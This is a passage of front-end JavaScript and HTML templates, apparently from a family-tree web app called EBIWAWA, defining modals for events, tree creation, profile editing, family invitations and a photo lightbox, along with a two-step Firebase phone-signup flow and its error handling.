                                    <div id="calendar-grid" class="mt-4">
                                        <p class="text-center text-gray-500">Loading calendar...</p>
                                    </div>
                                </div>

                                <!-- Agenda View -->
                                <div id="agenda-view-container" class="hidden">
                                    <div id="event-list" class="mt-4 space-y-3">
                                        <p class="text-center text-gray-500">Loading events...</p>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            `;
        }
        function CreateEventModal() {
            const calendarOptions = appState.calendars.map(cal => `<option value="${cal.id}">${escapeHtml(cal.name)}</option>`).join('');
            return `
                <div id="create-event-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="w-full max-w-lg p-8 space-y-6 rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300">
                        <h2 class="text-2xl font-bold">Create New Event</h2>
                        <form id="create-event-form" class="space-y-4">
                            <div><label for="event-title" class="text-sm font-medium text-text-secondary">Event Title</label><input id="event-title" type="text" required class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md"></div>
                            <div><label for="event-calendar" class="text-sm font-medium text-text-secondary">Calendar</label><select id="event-calendar" required class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md">${calendarOptions}</select></div>
                            <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
                                <div><label for="event-start-time" class="text-sm font-medium text-text-secondary">Start Time</label><input id="event-start-time" type="datetime-local" required class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md"></div>
                                <div><label for="event-end-time" class="text-sm font-medium text-text-secondary">End Time</label><input id="event-end-time" type="datetime-local" required class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md"></div>
                            </div>
                            <div id="create-event-error" class="text-sm text-center text-error"></div>
                            <div class="flex justify-end pt-4 space-x-4">
                                <button type="button" onclick="closeModal('create-event-modal')" class="btn btn-secondary">Cancel</button>
                                <button type="submit" class="btn btn-primary">Create Event</button>
                            </div>
                        </form>
                    </div>
                </div>
            `;
        }

        function CreateTreeModal() {
            return `
                <div id="create-tree-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="w-full max-w-lg p-8 space-y-6 rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300">
                        <h2 class="text-2xl font-bold">Create Your Family Tree</h2>
                        <p class="text-sm text-text-secondary">Start preserving your family's legacy today. You'll be the creator and first member of this tree.</p>
                        <form id="create-tree-form" class="space-y-4">
                            <div>
                                <label for="tree-name" class="text-sm font-medium text-text-secondary">Family Tree Name</label>
                                <input id="tree-name" type="text" required placeholder="e.g., The Okafor Family" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md">
                            </div>
                            <div>
                                <label for="user-name" class="text-sm font-medium text-text-secondary">Your Name</label>
                                <input id="user-name" type="text" required placeholder="e.g., Chidi Okafor" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md">
                            </div>
                            <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
                                <div>
                                    <label for="person-first-name" class="text-sm font-medium text-text-secondary">First Name</label>
                                    <input id="person-first-name" type="text" required placeholder="First name" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md">
                                </div>
                                <div>
                                    <label for="person-last-name" class="text-sm font-medium text-text-secondary">Last Name</label>
                                    <input id="person-last-name" type="text" required placeholder="Last name" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md">
                                </div>
                            </div>
                            <div class="grid grid-cols-1 sm:grid-cols-3 gap-4">
                                <div>
                                    <label for="person-birth-year" class="text-sm font-medium text-text-secondary">Birth Year</label>
                                    <input id="person-birth-year" type="number" placeholder="YYYY" min="1800" max="${new Date().getFullYear()}" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md">
                                </div>
                                <div>
                                    <label for="person-birth-month" class="text-sm font-medium text-text-secondary">Month</label>
                                    <input id="person-birth-month" type="number" placeholder="MM" min="1" max="12" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md">
                                </div>
                                <div>
                                    <label for="person-birth-day" class="text-sm font-medium text-text-secondary">Day</label>
                                    <input id="person-birth-day" type="number" placeholder="DD" min="1" max="31" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md">
                                </div>
                            </div>
                            <div>
                                <label for="person-gender" class="text-sm font-medium text-text-secondary">Gender</label>
                                <select id="person-gender" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md">
                                    <option value="">Prefer not to say</option>
                                    <option value="Male">Male</option>
                                    <option value="Female">Female</option>
                                </select>
                            </div>
                            <div id="create-tree-error" class="text-sm text-center text-error"></div>
                            <div class="flex justify-end pt-4 space-x-4">
                                <button type="button" onclick="closeModal('create-tree-modal')" class="btn btn-secondary">Cancel</button>
                                <button type="submit" class="btn btn-primary">Create Family Tree</button>
                            </div>
                        </form>
                    </div>
                </div>
            `;
        }

        function RenameTreeModal() {
            return `
                <div id="rename-tree-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="w-full max-w-md p-8 space-y-6 rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300">
                        <div class="flex items-start justify-between">
                            <div>
                                <h2 class="text-xl font-bold" style="color: var(--ebw-text);">Rename tree</h2>
                                <p class="text-sm mt-1" style="color: var(--ebw-text-muted);">Give your family tree a name that feels right. Only you (the creator) can rename it.</p>
                            </div>
                            <button type="button" onclick="closeModal('rename-tree-modal')" class="text-gray-400 hover:text-gray-600 transition-colors">
                                ${tablerIcon('x', { size: 20, preserveColor: true })}
                            </button>
                        </div>
                        <form id="rename-tree-form" onsubmit="handleRenameTree(event); return false;" class="space-y-4">
                            <div>
                                <label for="rename-tree-input" class="text-sm font-medium" style="color: var(--ebw-text-muted);">Tree name</label>
                                <input id="rename-tree-input" type="text" required maxlength="100" placeholder="e.g., Olaniyan" class="w-full px-3 py-2 mt-1 border rounded-md" style="border-color: var(--ebw-border);">
                                <p class="text-xs mt-1" style="color: var(--ebw-text-hint);">100 characters max. This is the name shown at the top of the tree.</p>
                            </div>
                            <div id="rename-tree-error" class="text-sm text-error hidden"></div>
                            <div class="flex justify-end gap-3 pt-2">
                                <button type="button" onclick="closeModal('rename-tree-modal')" class="ebw-btn ebw-btn-ghost">Cancel</button>
                                <button type="submit" class="ebw-btn ebw-btn-primary">Save</button>
                            </div>
                        </form>
                    </div>
                </div>
            `;
        }

        function EditProfileModal() {
            // Layout note: 13+ fields at ~48px each = ~700-800px content
            // height, which exceeds most desktop viewports. Restructured
            // 2026-07-17 into a 3-slot pinned-header / scroll-body /
            // pinned-footer flex-column so header and Save button are
            // always visible; only the fields scroll. `--vh` custom prop
            // used for iOS Safari (see CLAUDE.md responsive rules #5).
            return `
                <div id="edit-profile-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="w-full max-w-2xl flex flex-col rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300" style="max-height: calc(var(--vh, 100vh) - 2rem);">
                        <div class="flex items-center justify-between px-8 pt-8 pb-4 flex-shrink-0 border-b border-gray-200">
                            <h2 class="text-2xl font-bold">Edit Profile</h2>
                            <button type="button" onclick="closeModal('edit-profile-modal')" class="text-gray-400 hover:text-gray-600 transition-colors">
                                ${tablerIcon('x', { size: 24, preserveColor: true })}
                            </button>
                        </div>
                        <form id="edit-profile-form" class="flex-1 flex flex-col min-h-0">
                            <!-- overscroll-contain: keeps scroll-chain confined
                                 to this region so it doesn't bounce out to the
                                 modal-overlay's own overflow-y-auto (legacy
                                 fallback for very tall modals).
                                 bg-surface: scroll promotes this to its own
                                 compositor layer; without an explicit bg the
                                 layer paints transparent for a frame during
                                 scroll and shows through to the desktop
                                 backdrop-filter blur.
                                 will-change-scroll: keeps the wrapper on its
                                 own GPU layer permanently so fast scroll
                                 doesn't trigger promote/demote thrash against
                                 the backdrop-filter recomposite (subtle flash
                                 still visible after bg-surface alone). Cheap
                                 because the layer only exists while the
                                 modal is open. Reported 2026-07-17. -->
                            <div class="flex-1 overflow-y-auto overscroll-contain px-8 py-6 space-y-6 bg-surface will-change-scroll">
                            <!-- Avatar Upload Section -->
                            <div class="flex flex-col items-center space-y-4 pb-6 border-b border-gray-200">
                                <div class="relative">
                                    <div id="avatar-preview" class="w-32 h-32 rounded-full bg-gray-200 flex items-center justify-center overflow-hidden">
                                        ${tablerIcon('user-circle', { size: 48 })}
                                    </div>
                                    <label for="avatar-upload" class="absolute bottom-0 right-0 p-2 bg-primary text-white rounded-full cursor-pointer hover:bg-opacity-90">
                                        ${tablerIcon('photo', { size: 20, preserveColor: true })}
                                    </label>
                                    <input type="file" id="avatar-upload" accept="image/jpeg,image/jpg,image/png,image/gif,image/webp" class="hidden" onchange="handleAvatarPreview(event)">
                                </div>
                                <p class="text-sm text-text-secondary">Click the camera icon to upload a profile picture</p>
                                <p class="text-xs text-text-secondary">Supported: JPG, PNG, GIF, WebP (max 5MB)</p>
                            </div>

                            <!-- Profile Fields -->
                            <div class="grid grid-cols-1 gap-4">
                                <div class="grid grid-cols-1 sm:grid-cols-2 gap-4">
                                    <div>
                                        <label for="profile-first-name" class="text-sm font-medium text-text-secondary">First Name</label>
                                        <input id="profile-first-name" type="text" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md" placeholder="First name">
                                    </div>
                                    <div>
                                        <label for="profile-last-name" class="text-sm font-medium text-text-secondary">Last Name</label>
                                        <input id="profile-last-name" type="text" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md" placeholder="Last name">
                                    </div>
                                </div>

                                <div>
                                    <label for="profile-middle-name" class="text-sm font-medium text-text-secondary">Middle Name (Optional)</label>
                                    <input id="profile-middle-name" type="text" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md" placeholder="Middle name">
                                </div>

                                <div>
                                    <label for="profile-suffix" class="text-sm font-medium text-text-secondary">Suffix (Optional)</label>
                                    <select id="profile-suffix" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md">
                                        <option value="">None</option>
                                        <option value="Jr.">Jr.</option>
                                        <option value="Sr.">Sr.</option>
                                        <option value="II">II</option>
                                        <option value="III">III</option>
                                        <option value="IV">IV</option>
                                        <option value="V">V</option>
                                    </select>
                                </div>

                                <div>
                                    <label for="profile-bio" class="text-sm font-medium text-text-secondary">Bio</label>
                                    <textarea id="profile-bio" rows="3" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md" placeholder="Tell us about yourself..."></textarea>
                                </div>

                                <!-- B44: Date of Birth (year + month + day). Birth context
                                     is core to the platform's storytelling/differentiation;
                                     surfacing it on My Profile, not only via the FTV Person
                                     card edit path. Persists to User node AND backfills the
                                     linked Person via the existing REPRESENTS plumbing. -->
                                <div>
                                    <label class="text-sm font-medium text-text-secondary">Date of Birth</label>
                                    <div class="grid grid-cols-1 sm:grid-cols-3 gap-2 mt-1">
                                        <div>
                                            <label for="profile-birth-year" class="text-xs text-gray-500">Year</label>
                                            <input id="profile-birth-year" type="number" placeholder="YYYY" min="1800" max="${new Date().getFullYear()}" class="w-full px-3 py-2 border border-gray-300 rounded-md">
                                        </div>
                                        <div>
                                            <label for="profile-birth-month" class="text-xs text-gray-500">Month</label>
                                            <input id="profile-birth-month" type="number" placeholder="MM" min="1" max="12" class="w-full px-3 py-2 border border-gray-300 rounded-md">
                                        </div>
                                        <div>
                                            <label for="profile-birth-day" class="text-xs text-gray-500">Day</label>
                                            <input id="profile-birth-day" type="number" placeholder="DD" min="1" max="31" class="w-full px-3 py-2 border border-gray-300 rounded-md">
                                        </div>
                                    </div>
                                    <p class="text-xs text-gray-500 mt-1">Optional — year alone is fine if you don't remember the exact day. Year only goes back to 1800.</p>
                                </div>

                                <div>
                                    <label class="text-sm font-medium text-text-secondary">Birth Place</label>
                                    <div class="grid grid-cols-1 sm:grid-cols-3 gap-2 mt-1">
                                        <div>
                                            <label for="profile-birth-city" class="text-xs text-gray-500">City</label>
                                            <input id="profile-birth-city" type="text" class="w-full px-3 py-2 border border-gray-300 rounded-md">
                                        </div>
                                        <div>
                                            <label for="profile-birth-state" class="text-xs text-gray-500">State / Province / Region</label>
                                            <input id="profile-birth-state" type="text" class="w-full px-3 py-2 border border-gray-300 rounded-md">
                                        </div>
                                        <div>
                                            <label for="profile-birth-country" class="text-xs text-gray-500">Country</label>
                                            <input id="profile-birth-country" type="text" class="w-full px-3 py-2 border border-gray-300 rounded-md">
                                        </div>
                                    </div>
                                </div>

                                <div>
                                    <label for="profile-current-location" class="text-sm font-medium text-text-secondary">Current Location</label>
                                    <input id="profile-current-location" type="text" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md" placeholder="City, Region, Country">
                                </div>

                                <div>
                                    <label for="profile-occupation" class="text-sm font-medium text-text-secondary">Occupation</label>
                                    <input id="profile-occupation" type="text" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md" placeholder="Your profession">
                                </div>

                                <div>
                                    <label for="profile-languages" class="text-sm font-medium text-text-secondary">Languages</label>
                                    <input id="profile-languages" type="text" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md" placeholder="e.g., English, Igbo, Yoruba (comma separated)">
                                </div>

                                <div>
                                    <label for="profile-ethnic-group" class="text-sm font-medium text-text-secondary">Ethnic Group(s)</label>
                                    <input id="profile-ethnic-group" type="text" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md" placeholder="e.g., Igbo, Yoruba, Hausa">
                                </div>

                                <div>
                                    <label for="profile-tribe" class="text-sm font-medium text-text-secondary">Tribe / Clan</label>
                                    <input id="profile-tribe" type="text" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md" placeholder="e.g., Mbaise, Oyo, Fulani">
                                </div>

                                <div>
                                    <label for="profile-hometown" class="text-sm font-medium text-text-secondary">Hometown</label>
                                    <input id="profile-hometown" type="text" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md" placeholder="Your ancestral or hometown">
                                </div>
                            </div>

                            </div>
                            <div class="flex justify-end gap-3 px-8 py-4 border-t border-gray-200 flex-shrink-0 bg-surface rounded-b-lg">
                                <button type="button" onclick="closeModal('edit-profile-modal')" class="px-6 py-2 font-semibold text-gray-600 border border-gray-300 rounded-md hover:bg-gray-50">
                                    Cancel
                                </button>
                                <button type="submit" class="btn btn-primary">
                                    Save Changes
                                </button>
                            </div>
                        </form>
                    </div>
                </div>
            `;
        }

        // Phone-signup modal — two-step (phone entry → code verification).
        // Country codes are a small starter list with +234 Nigeria and +233
        // Ghana at the top per the migration brief. A full ISO country picker
        // is a follow-up polish; this list covers the West African diaspora
        // majority + the top English-speaking countries. Reserve a hidden
        // #recaptcha-container element that Firebase's RecaptchaVerifier
        // (invisible mode) can attach to — Firebase needs a real DOM node
        // even for invisible reCAPTCHA.
        function PhoneSignupModal() {
            return `
                <div id="phone-signup-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="w-full max-w-md p-8 space-y-6 rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300">
                        <div class="flex justify-between items-center">
                            <h2 class="text-xl font-bold">Sign up with phone</h2>
                            <button type="button" onclick="closeModal('phone-signup-modal')" class="text-gray-400 hover:text-gray-600" aria-label="Close">
                                <svg class="w-5 h-5" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><line x1="18" y1="6" x2="6" y2="18"/><line x1="6" y1="6" x2="18" y2="18"/></svg>
                            </button>
                        </div>

                        <!-- Step 1: phone entry -->
                        <div id="phone-step-phone">
                            <label for="phone-country-code" class="block text-sm font-medium text-gray-700 mb-1">Country</label>
                            <select id="phone-country-code" class="w-full px-3 py-2 border border-gray-300 rounded-lg focus:ring-2 focus:ring-primary focus:border-primary">
                                <option value="+234">Nigeria (+234)</option>
                                <option value="+233">Ghana (+233)</option>
                                <option disabled>──────────</option>
                                <option value="+1">United States / Canada (+1)</option>
                                <option value="+44">United Kingdom (+44)</option>
                                <option value="+27">South Africa (+27)</option>
                                <option value="+254">Kenya (+254)</option>
                                <option value="+256">Uganda (+256)</option>
                                <option value="+255">Tanzania (+255)</option>
                                <option value="+250">Rwanda (+250)</option>
                                <option value="+225">Côte d'Ivoire (+225)</option>
                                <option value="+237">Cameroon (+237)</option>
                                <option value="+221">Senegal (+221)</option>
                                <option value="+61">Australia (+61)</option>
                            </select>

                            <label for="phone-signup-input" class="block text-sm font-medium text-gray-700 mt-4 mb-1">Phone number</label>
                            <input type="tel" id="phone-signup-input" placeholder="801 234 5678" inputmode="tel" autocomplete="tel-national" class="w-full px-3 py-2 border border-gray-300 rounded-lg focus:ring-2 focus:ring-primary focus:border-primary">
                            <p class="text-xs text-gray-500 mt-1">Standard message rates may apply.</p>

                            <div id="phone-send-error" class="hidden mt-3 p-3 bg-red-50 border border-red-200 rounded-lg text-sm text-red-700"></div>

                            <!-- Firebase's invisible reCAPTCHA needs a real DOM
                                 node to attach to — must stay in the modal, not
                                 hoisted to body, or Firebase can't find it. -->
                            <div id="recaptcha-container" class="mt-3"></div>

                            <button type="button" id="phone-send-code-btn" onclick="handlePhoneSendCode()" class="mt-4 w-full px-4 py-3 bg-primary text-white rounded-lg font-semibold hover:bg-primary-dark transition-colors">
                                Send code
                            </button>
                        </div>

                        <!-- Step 2: code entry (hidden initially) -->
                        <div id="phone-step-code" class="hidden">
                            <p class="text-sm text-gray-700">Enter the 6-digit code we sent to <span id="phone-display" class="font-medium"></span>.</p>
                            <input type="text" id="phone-code-input" inputmode="numeric" pattern="[0-9]*" maxlength="6" autocomplete="one-time-code" class="mt-3 w-full px-3 py-3 border border-gray-300 rounded-lg text-center text-2xl tracking-widest focus:ring-2 focus:ring-primary focus:border-primary" placeholder="123456">

                            <div id="phone-verify-error" class="hidden mt-3 p-3 bg-red-50 border border-red-200 rounded-lg text-sm text-red-700"></div>

                            <button type="button" id="phone-verify-btn" onclick="handlePhoneVerifyCode()" class="mt-4 w-full px-4 py-3 bg-primary text-white rounded-lg font-semibold hover:bg-primary-dark transition-colors">
                                Verify and continue
                            </button>
                            <button type="button" onclick="handlePhoneBackToNumber()" class="mt-2 w-full px-4 py-2 text-sm text-gray-600 hover:text-gray-800">
                                ← Change phone number
                            </button>
                        </div>
                    </div>
                </div>
            `;
        }

        // Phone-signup module-level state. Reset every time the modal
        // opens; do not persist across attempts.
        let _phoneAuthChannel = null;
        let _phoneVerificationId = null;
        let _phoneFullNumber = null;

        function _phoneShowError(elId, message) {
            const el = document.getElementById(elId);
            if (!el) return;
            el.textContent = message;
            el.classList.remove('hidden');
        }
        function _phoneHideError(elId) {
            const el = document.getElementById(elId);
            if (el) el.classList.add('hidden');
        }

        function openPhoneSignupModal() {
            // Fresh state for every open — a prior attempt's verifier
            // must be released or Firebase throws "reCAPTCHA has already
            // been rendered in this element" on the second try.
            if (_phoneAuthChannel) _phoneAuthChannel.reset();
            _phoneAuthChannel = getAuthChannel(FEATURES);
            _phoneVerificationId = null;
            _phoneFullNumber = null;

            // Reset UI to step 1
            document.getElementById('phone-step-phone').classList.remove('hidden');
            document.getElementById('phone-step-code').classList.add('hidden');
            document.getElementById('phone-signup-input').value = '';
            document.getElementById('phone-code-input').value = '';
            _phoneHideError('phone-send-error');
            _phoneHideError('phone-verify-error');

            openModal('phone-signup-modal');
            // Focus the phone input for keyboard users
            setTimeout(() => document.getElementById('phone-signup-input')?.focus(), 100);
        }

        async function handlePhoneSendCode() {
            _phoneHideError('phone-send-error');
            const cc = document.getElementById('phone-country-code').value;
            const localPart = document.getElementById('phone-signup-input').value.trim();
            if (!localPart) {
                _phoneShowError('phone-send-error', 'Enter your phone number.');
                return;
            }
            // Digits only for the national part; country code carries the '+'
            const digits = localPart.replace(/\D/g, '');
            if (digits.length < 6) {
                _phoneShowError('phone-send-error', 'That phone number looks too short.');
                return;
            }
            _phoneFullNumber = cc + digits;

            const btn = document.getElementById('phone-send-code-btn');
            const origText = btn.textContent;
            btn.disabled = true;
            btn.textContent = 'Sending…';
            try {
                const container = document.getElementById('recaptcha-container');
                const { verificationId } = await _phoneAuthChannel.sendCode(_phoneFullNumber, container);
                _phoneVerificationId = verificationId;
                document.getElementById('phone-display').textContent = _phoneFullNumber;
                document.getElementById('phone-step-phone').classList.add('hidden');
                document.getElementById('phone-step-code').classList.remove('hidden');
                setTimeout(() => document.getElementById('phone-code-input')?.focus(), 100);
            } catch (error) {
                console.error('Phone send failed:', error);
                // Firebase's error surface for phone auth is inconsistent —
                // sometimes error.code (auth/invalid-phone-number etc.),
                // sometimes just error.message. Show the friendliest thing
                // we can extract.
                let msg = 'Could not send the code. Please try again.';
                if (error && error.code === 'auth/invalid-phone-number') {
                    msg = 'That phone number format isn\'t valid. Check the country code + number.';
                } else if (error && error.code === 'auth/too-many-requests') {
                    msg = 'Too many attempts from this device. Try again later.';
                } else if (error && error.code === 'auth/quota-exceeded') {
                    msg = 'Phone verification is temporarily unavailable. Please try again shortly.';
                } else if (error && error.message) {
                    msg = error.message;
                }
                _phoneShowError('phone-send-error', msg);
                // Reset the verifier so a retry gets a fresh one
                if (_phoneAuthChannel) _phoneAuthChannel.reset();
            } finally {
                btn.disabled = false;
                btn.textContent = origText;
            }
        }

        async function handlePhoneVerifyCode() {
            _phoneHideError('phone-verify-error');
            const code = document.getElementById('phone-code-input').value.trim();
            if (!/^\d{6}$/.test(code)) {
                _phoneShowError('phone-verify-error', 'Enter the 6-digit code.');
                return;
            }
            if (!_phoneVerificationId) {
                _phoneShowError('phone-verify-error', 'Session expired. Go back and request a new code.');
                return;
            }

            const btn = document.getElementById('phone-verify-btn');
            const origText = btn.textContent;
            btn.disabled = true;
            btn.textContent = 'Verifying…';
            try {
                await _phoneAuthChannel.verifyCode(_phoneVerificationId, code);
                // Success — auth-state listener (onAuthStateChanged) fires
                // and routes through the standard signed-in flow (either
                // dashboard or onboarding wizard, depending on whether
                // /me shows a completed profile). Close the modal so the
                // route change is visible.
                closeModal('phone-signup-modal');
            } catch (error) {
                console.error('Phone verify failed:', error);
                let msg = 'That code didn\'t verify. Please check and try again.';
                if (error && error.code === 'auth/invalid-verification-code') {
                    msg = 'That code isn\'t right. Please check and try again.';
                } else if (error && error.code === 'auth/code-expired') {
                    msg = 'This code has expired. Go back and request a new one.';
                } else if (error && error.message) {
                    msg = error.message;
                }
                _phoneShowError('phone-verify-error', msg);
            } finally {
                btn.disabled = false;
                btn.textContent = origText;
            }
        }

        function handlePhoneBackToNumber() {
            // Step 2 → step 1: user wants to try a different number.
            // Release the current reCAPTCHA verifier + clear verification
            // state so a fresh Send Code call gets clean state.
            _phoneVerificationId = null;
            if (_phoneAuthChannel) _phoneAuthChannel.reset();
            _phoneHideError('phone-verify-error');
            _phoneHideError('phone-send-error');
            document.getElementById('phone-step-code').classList.add('hidden');
            document.getElementById('phone-step-phone').classList.remove('hidden');
            document.getElementById('phone-code-input').value = '';
            setTimeout(() => document.getElementById('phone-signup-input')?.focus(), 100);
        }

        function InviteFamilyModal() {
            return `
                <div id="invite-family-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="w-full max-w-lg p-8 space-y-6 rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300">
                        <h2 class="text-2xl font-bold">Invite Family Member</h2>
                        <p id="invite-family-subtitle" class="text-sm text-gray-600">Generate an invitation link to share with someone you want on your family tree.</p>

                        <form id="invite-family-form" class="space-y-4" onsubmit="handleSendInvite(event); return false;">
                            <div id="invite-form-fields">
                                <div>
                                    <label for="invite-email" class="text-sm font-medium text-text-secondary">Email Address *</label>
                                    <input id="invite-email" type="email" required placeholder="family@example.com" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <p class="text-xs text-gray-500 mt-1">We'll generate an invitation link for you to share with them (by text, email, or WhatsApp). The link is bound to this email — they'll need to sign up using it.</p>
                                </div>

                                <div class="mt-4">
                                    <label for="invite-relationship" class="text-sm font-medium text-text-secondary">Relationship to You (Optional)</label>
                                    <select id="invite-relationship" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                        <option value="">Select relationship...</option>
                                        <option value="parent">Parent</option>
                                        <option value="child">Child</option>
                                        <option value="sibling">Sibling</option>
                                        <option value="spouse">Spouse/Partner</option>
                                        <option value="grandparent">Grandparent</option>
                                        <option value="grandchild">Grandchild</option>
                                        <option value="aunt-uncle">Aunt/Uncle</option>
                                        <option value="niece-nephew">Niece/Nephew</option>
                                        <option value="cousin">Cousin</option>
                                        <option value="collaborator">Collaborator/Researcher</option>
                                        <option value="other">Other</option>
                                    </select>
                                    <p class="text-xs text-gray-500 mt-1">Optional - helpful for family members, not required for collaborators</p>
                                </div>

                                <div class="mt-4">
                                    <label for="invite-message" class="text-sm font-medium text-text-secondary">Personal Message (Optional)</label>
                                    <textarea id="invite-message" rows="3" placeholder="Hey! I'm building our family tree on EBIWAWA. Would love for you to join..." class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary"></textarea>
                                </div>
                            </div>

                            <div id="invite-error" class="text-sm text-center text-error hidden"></div>
                            <div id="invite-success" class="text-sm text-center text-green-600 hidden"></div>

                            <div class="flex justify-end gap-3 pt-4">
                                <button type="button" onclick="closeModal('invite-family-modal')" class="px-6 py-2 font-semibold text-gray-600 border border-gray-300 rounded-md hover:bg-gray-50">
                                    Cancel
                                </button>
                                <button type="submit" class="btn btn-primary">
                                    Send Invitation
                                </button>
                            </div>
                        </form>
                    </div>
                </div>
            `;
        }

        function PhotoLightboxModal() {
            // Mobile-first per the responsive rules:
            //   - Toolbar collapses to icon-only below sm: (labels wrapped in
            //     <span class="hidden sm:inline">). aria-label carries the
            //     accessible name on both sides. min-h/min-w [44px] on every
            //     button for HIG touch targets.
            //   - Close × stays pinned top-right and always fits regardless of
            //     left-group width (flex-shrink-0 + min-w-0 on the left group
            //     so it can compress instead of pushing × off-screen).
            //   - Overlay backdrop click closes the lightbox when the tap
            //     target IS the overlay itself (not the image or a panel).
            //   - Container padding responsive so the photo isn't crushed by
            //     desktop-scale padding at 390px.
            //   - Desktop prev/next chevrons hidden below sm:; single-finger
            //     horizontal swipe replaces them (wired in openPhotoLightbox).
            //   - Bottom panels use explicit left-4 right-4 mx-auto max-w-*
            //     insets instead of left-1/2 -translate-x-1/2 w-full mx-4 —
            //     same RecipientPicker geometry lesson from the Chat pass:
            //     centered-transform + margins overflow at narrow widths.
            //     safe-area-bottom on both panels (deep rule 7).
            return `
                <div id="photo-lightbox-modal" onclick="if(event.target===event.currentTarget)closePhotoLightbox()" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden overscroll-contain will-change-scroll">
                    <!-- Top Bar. Actions container carries .ebw-lightbox-actions
                         so the F23 read-only feed flow can hide it via CSS
                         without touching the close × or toolbar layout. -->
                    <div class="ebw-lightbox-toolbar absolute top-4 left-4 right-4 flex items-center justify-between gap-2 z-50">
                        <div class="ebw-lightbox-actions flex gap-2 min-w-0">
                            <button onclick="deleteCurrentPhoto()" aria-label="Delete photo" class="ebw-lightbox-action-delete bg-red-600 hover:bg-red-700 text-white min-h-[44px] min-w-[44px] px-3 sm:px-4 py-2 rounded-md flex items-center justify-center gap-2 transition-colors">
                                ${tablerIcon('trash', { size: 20, preserveColor: true })}
                                <span class="ebw-lightbox-btn-label">Delete</span>
                            </button>
                            <button onclick="togglePhotoTagging()" aria-label="Tag people in photo" class="ebw-lightbox-action-tag bg-blue-600 hover:bg-blue-700 text-white min-h-[44px] min-w-[44px] px-3 sm:px-4 py-2 rounded-md flex items-center justify-center gap-2 transition-colors">
                                ${tablerIcon('users', { size: 20, preserveColor: true })}
                                <span id="tag-people-btn-text" class="ebw-lightbox-btn-label">Tag People</span>
                            </button>
                            <button onclick="aiDescribeCurrentPhoto()" aria-label="Analyze photo with AI" class="ebw-lightbox-action-ai bg-purple-600 hover:bg-purple-700 text-white min-h-[44px] min-w-[44px] px-3 sm:px-4 py-2 rounded-md flex items-center justify-center gap-2 transition-colors">
                                ${tablerIcon('wand', { size: 20, preserveColor: true })}
                                <span class="ebw-lightbox-btn-label">AI Describe</span>
                            </button>
                        </div>
                        <button onclick="closePhotoLightbox()" aria-label="Close" class="text-white text-4xl leading-none hover:text-gray-300 min-h-[44px] min-w-[44px] flex items-center justify-center flex-shrink-0">&times;</button>
                    </div>

                    <!-- Previous Button (fine-pointer only per F19; touch uses swipe from Prompt 8) -->
                    <button onclick="navigatePhoto(-1)" aria-label="Previous photo" class="ebw-lightbox-navbtn absolute left-4 top-1/2 transform -translate-y-1/2 bg-black bg-opacity-50 text-white p-4 rounded-full hover:bg-opacity-75 transition-all z-50">
                        ${tablerIcon('chevron-left', { size: 24, preserveColor: true })}
                    </button>

                    <!-- Next Button (fine-pointer only per F19; touch uses swipe from Prompt 8) -->
